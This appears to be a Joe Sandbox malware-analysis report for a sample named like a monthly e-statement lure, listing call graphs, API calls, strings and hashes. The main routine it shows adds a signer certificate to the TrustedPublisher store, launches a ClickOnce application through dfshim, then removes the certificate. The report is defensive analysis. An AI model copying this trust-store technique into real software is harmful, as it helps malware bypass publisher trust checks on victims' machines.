5669->5670 5673 f25507 _abort 5669->5673 5671 f247f9 __dosmaperr 15 API calls 5670->5671 5672 f254f9 5671->5672 5674 f2473d _abort 21 API calls 5672->5674 5675 f25535 5673->5675 5676 f2553e 5673->5676 5673->5678 5674->5678 5677 f247f9 __dosmaperr 15 API calls 5675->5677 5676->5678 5680 f247f9 __dosmaperr 15 API calls 5676->5680 5679 f2553a 5677->5679 5678->5658 5681 f2473d _abort 21 API calls 5679->5681 5680->5679 5681->5678 5682->5667 5684 f23f72 __fassign 33 API calls 5683->5684 5685 f25571 5684->5685 5685->5075 5687 f2356a _abort 5686->5687 5693 f23582 5687->5693 5701 f236b8 GetModuleHandleW 5687->5701 5708 f256e2 EnterCriticalSection 5693->5708 5695 f2358a 5699 f235ff _abort 5695->5699 5709 f23c97 5695->5709 5696 f23671 _abort 5696->5107 5712 f23668 5699->5712 5702 f23576 5701->5702 5702->5693 5703 f236fc GetModuleHandleExW 5702->5703 5704 f23726 GetProcAddress 5703->5704 5705 f2373b 5703->5705 5704->5705 5706 f2374f FreeLibrary 5705->5706 5707 f23758 _ValidateLocalCookies 5705->5707 5706->5707 5707->5693 5708->5695 5723 f239d0 5709->5723 5743 f2572a LeaveCriticalSection 5712->5743 5714 f23641 5714->5696 5715 f23677 5714->5715 5744 f25b1f 5715->5744 5717 f23681 5718 f236a5 5717->5718 5719 f23685 GetPEB 5717->5719 5721 f236fc _abort 3 API calls 5718->5721 5719->5718 5720 f23695 GetCurrentProcess TerminateProcess 5719->5720 5720->5718 5722 f236ad ExitProcess 5721->5722 5726 f2397f 5723->5726 5725 f239f4 5725->5699 5727 f2398b ___scrt_is_nonwritable_in_current_image 5726->5727 5734 f256e2 EnterCriticalSection 5727->5734 5729 f23999 5735 f23a20 5729->5735 5731 f239a6 5739 f239c4 5731->5739 5733 f239b7 _abort 5733->5725 5734->5729 5736 f23a48 5735->5736 5738 f23a40 _ValidateLocalCookies 5735->5738 5737 f24869 _free 15 API calls 5736->5737 5736->5738 5737->5738 5738->5731 5742 f2572a LeaveCriticalSection 5739->5742 5741 f239ce 5741->5733 5742->5741 5743->5714 5745 f25b44 5744->5745 5747 f25b3a _ValidateLocalCookies 5744->5747 5746 f25741 _abort 5 API calls 5745->5746 5746->5747 5747->5717 6298 f2324d 6299 f2522b 46 API calls 6298->6299 6300 f2325f 6299->6300 6309 f2561e GetEnvironmentStringsW 6300->6309 6303 f2326a 6305 f24869 _free 15 API calls 6303->6305 6306 f2329f 6305->6306 6307 f24869 _free 15 API calls 6307->6303 6308 f23275 6308->6307 6310 f25635 6309->6310 6320 f25688 6309->6320 6313 f2563b WideCharToMultiByte 6310->6313 6311 f25691 FreeEnvironmentStringsW 6312 f23264 6311->6312 6312->6303 6321 f232a5 6312->6321 6314 f25657 6313->6314 6313->6320 6315 f262ff 16 API calls 6314->6315 6316 f2565d 6315->6316 6317 f2567a 6316->6317 6318 f25664 WideCharToMultiByte 6316->6318 6319 f24869 _free 15 API calls 6317->6319 6318->6317 6319->6320 6320->6311 6320->6312 6322 f232ba 6321->6322 6323 f2480c _abort 15 API calls 6322->6323 6333 f232e1 6323->6333 6324 f23345 6325 f24869 _free 15 API calls 6324->6325 6326 f2335f 6325->6326 6326->6308 6327 f2480c _abort 15 API calls 6327->6333 6328 f23347 6330 f23376 15 API calls 6328->6330 6331 f2334d 6330->6331 6332 f24869 _free 15 API calls 6331->6332 6332->6324 6333->6324 6333->6327 6333->6328 6334 f23369 6333->6334 6336 f24869 _free 15 API calls 6333->6336 6338 f23eca 6333->6338 6335 f2474d _abort 6 API calls 6334->6335 6337 f23375 6335->6337 6336->6333 6339 f23ed7 6338->6339 6340 f23ee5 6338->6340 6339->6340 6345 f23efc 6339->6345 6341 f247f9 __dosmaperr 15 API calls 6340->6341 6342 f23eed 6341->6342 6343 f2473d _abort 21 API calls 6342->6343 6344 f23ef7 6343->6344 6344->6333 6345->6344 6346 f247f9 __dosmaperr 15 API calls 6345->6346 6346->6342

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,00000104), ref: 00F21016
                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00F21025
                                                                                                                                                                                                                                                                    • CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00F21032
                                                                                                                                                                                                                                                                    • LocalAlloc.KERNELBASE(00000000,00040000), ref: 00F21057
                                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,00040000), ref: 00F21063
                                                                                                                                                                                                                                                                    • CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00F21082
                                                                                                                                                                                                                                                                    • CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 00F210B2
                                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,?), ref: 00F210C5
                                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,00002000), ref: 00F210F4
                                                                                                                                                                                                                                                                    • CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 00F2110A
                                                                                                                                                                                                                                                                    • CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 00F2111A
                                                                                                                                                                                                                                                                    • CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 00F2112D
                                                                                                                                                                                                                                                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 00F21134
                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00F2113E
                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00F2115D
                                                                                                                                                                                                                                                                    • CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 00F2116E
                                                                                                                                                                                                                                                                    • CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00F21182
                                                                                                                                                                                                                                                                    • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00F21198
                                                                                                                                                                                                                                                                    • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 00F211A9
                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(dfshim), ref: 00F211BA
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 00F211C6
                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00009C40), ref: 00F211E8
                                                                                                                                                                                                                                                                    • CertDeleteCertificateFromStore.CRYPT32(?), ref: 00F2120B
                                                                                                                                                                                                                                                                    • CertCloseStore.CRYPT32(?,00000000), ref: 00F2121A
                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00F21223
                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00F21228
                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00F2122D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
                                                                                                                                                                                                                                                                    • String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
                                                                                                                                                                                                                                                                    • API String ID: 335784236-860318880
                                                                                                                                                                                                                                                                    • Opcode ID: b2627190145e87afb0bc0022df141817151d1fb2773fd589aa1717b862d07f51
                                                                                                                                                                                                                                                                    • Instruction ID: df936b72a50e6499740f6b1751f964f37cc790ccb325ac6001eac6a8d0bcd841
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2627190145e87afb0bc0022df141817151d1fb2773fd589aa1717b862d07f51
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88613E71E40219AFEB21DB94DC45FAFBBB9FF48B50F140055FA14B7290C771A901ABA8
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00F2192B
                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00F219F7
                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F21A10
                                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00F21A1A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                                                                                    • Opcode ID: f6147485a8c9284ab006bbb69a1dbc995bdbad2cfe4c6ccc340a5c370cc45386
                                                                                                                                                                                                                                                                    • Instruction ID: 6721858741b5aed92e8d9e97b03d78ccdd3b09ae766b55f5aef1339542e7a5e1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6147485a8c9284ab006bbb69a1dbc995bdbad2cfe4c6ccc340a5c370cc45386
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C311475D012289BDB21DFA4DD49BCDBBB8BF08300F1041AAE40DAB250EB749A85DF45
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00F2466B
                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00F24675
                                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00F24682
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8c9e644e6f3bb3b1c6e742849f19c52c1b539a51fe1bbcd9d34dd581c48df4ed
                                                                                                                                                                                                                                                                    • Instruction ID: 84465f0757d6faaa46da7a8f459d92533af52ebc641b7243f933ef18dd1156cb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c9e644e6f3bb3b1c6e742849f19c52c1b539a51fe1bbcd9d34dd581c48df4ed
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6131C67490122C9BCB21DF64DD89B8DBBB8BF18310F5041DAE81DA7250E7749F859F45
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00F2364D,?,00F302E0,0000000C,00F237A4,?,00000002,00000000,?,00F23F66,00000003,00F2209F,00F21AFC), ref: 00F23698
                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00F2364D,?,00F302E0,0000000C,00F237A4,?,00000002,00000000,?,00F23F66,00000003,00F2209F,00F21AFC), ref: 00F2369F
                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00F236B1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                    • Opcode ID: f065e3abbe6d183d1f7baa366e2432e5c8856d8b9559ffc7784fa0b756f467fb
                                                                                                                                                                                                                                                                    • Instruction ID: c7af0ed2c116413b9ec6a7b5a7dc0679c37da8fe85d04986eb4783c3d585eecf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f065e3abbe6d183d1f7baa366e2432e5c8856d8b9559ffc7784fa0b756f467fb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0AE09271410558ABCF22AF54ED09E5A3F69EF40755B044014FA559A231DB39DA42EA50
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: .
                                                                                                                                                                                                                                                                    • API String ID: 0-248832578
                                                                                                                                                                                                                                                                    • Opcode ID: 10c7ae9274260eef765add62be9d16583cb2b5ad08998321691c47bdca4ecc46
                                                                                                                                                                                                                                                                    • Instruction ID: 497be68279cff455a69fed9c37e1d7640ea6396b4d70e3226fadb4576bcc46f4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10c7ae9274260eef765add62be9d16583cb2b5ad08998321691c47bdca4ecc46
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5310671C00219ABCB24CE78DC84EFA7BBDEB85314F004198F519D7251E6B4AD449B50
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F2A490,?,?,00000008,?,?,00F2A130,00000000), ref: 00F2A6C2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                    • Opcode ID: c0f0621df3b7ce3c1834ba3f74a0c3c079a7f72729fd7a96aff70d9dc78c3fc8
                                                                                                                                                                                                                                                                    • Instruction ID: 7dc95715e28d8c44595cce1a2246149a8c44b40855f76975675d786dd003b425
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0f0621df3b7ce3c1834ba3f74a0c3c079a7f72729fd7a96aff70d9dc78c3fc8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99B17D32610618CFD719CF28D48AB657FE0FF05364F298698E89ACF2A1C335D992DB41
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F21BEA
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                    • Opcode ID: 059a7528c6485be595c93f2be7d5138df731417f3879e2704232e9b45a4051a4
                                                                                                                                                                                                                                                                    • Instruction ID: e9b39d46e68d18fb720169699c18f5b75d28a31f1c46e5f12a41f118b456c996
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 059a7528c6485be595c93f2be7d5138df731417f3879e2704232e9b45a4051a4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E51AEB5E50229CFEB18CF64E9817AEBBF1FB98324F14812AC401EB290D3749941DF54
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00F21300), ref: 00F21AB1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                    • Opcode ID: 23fb39e1fcb7ab4da4683ec438fa95bfe96ee38fc4289c6a9bb170919a98b14b
                                                                                                                                                                                                                                                                    • Instruction ID: 66e9c1e9e84d7f72f5a77a6822e06eff0ae0497dd009120cdd00156609b406d5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23fb39e1fcb7ab4da4683ec438fa95bfe96ee38fc4289c6a9bb170919a98b14b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                                                                                                    • Opcode ID: ec2288570b5bee8ece5257118084cb21b5692ae705bf9093bb22b2160bffbee8
                                                                                                                                                                                                                                                                    • Instruction ID: a7d9745ccaaea55e91815054a02092726782a1e0fc44c22661b237d97d525052
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec2288570b5bee8ece5257118084cb21b5692ae705bf9093bb22b2160bffbee8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30A002706111099B57509F356B563093699574569171540555505C5160D76444517A11

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 81 f26507-f2651b 82 f26589-f26591 81->82 83 f2651d-f26522 81->83 84 f26593-f26596 82->84 85 f265d8-f265f0 call f2667a 82->85 83->82 86 f26524-f26529 83->86 84->85 87 f26598-f265d5 call f24869 * 4 84->87 94 f265f3-f265fa 85->94 86->82 89 f2652b-f2652e 86->89 87->85 89->82 92 f26530-f26538 89->92 95 f26552-f2655a 92->95 96 f2653a-f2653d 92->96 100 f26619-f2661d 94->100 101 f265fc-f26600 94->101 98 f26574-f26588 call f24869 * 2 95->98 99 f2655c-f2655f 95->99 96->95 102 f2653f-f26551 call f24869 call f26078 96->102 98->82 99->98 107 f26561-f26573 call f24869 call f26176 99->107 108 f26635-f26641 100->108 109 f2661f-f26624 100->109 103 f26602-f26605 101->103 104 f26616 101->104 102->95 103->104 111 f26607-f26615 call f24869 * 2 103->111 104->100 107->98 108->94 118 f26643-f26650 call f24869 108->118 115 f26632 109->115 116 f26626-f26629 109->116 111->104 115->108 116->115 124 f2662b-f26631 call f24869 116->124 124->115
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 00F2654B
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F26095
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F260A7
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F260B9
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F260CB
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F260DD
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F260EF
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F26101
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F26113
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F26125
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F26137
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F26149
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F2615B
                                                                                                                                                                                                                                                                      • Part of subcall function 00F26078: _free.LIBCMT ref: 00F2616D
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F26540
                                                                                                                                                                                                                                                                      • Part of subcall function 00F24869: HeapFree.KERNEL32(00000000,00000000,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?), ref: 00F2487F
                                                                                                                                                                                                                                                                      • Part of subcall function 00F24869: GetLastError.KERNEL32(?,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?,?), ref: 00F24891
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F26562
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F26577
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F26582
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F265A4
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F265B7
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F265C5
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F265D0
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F26608
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F2660F
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F2662C
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F26644
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
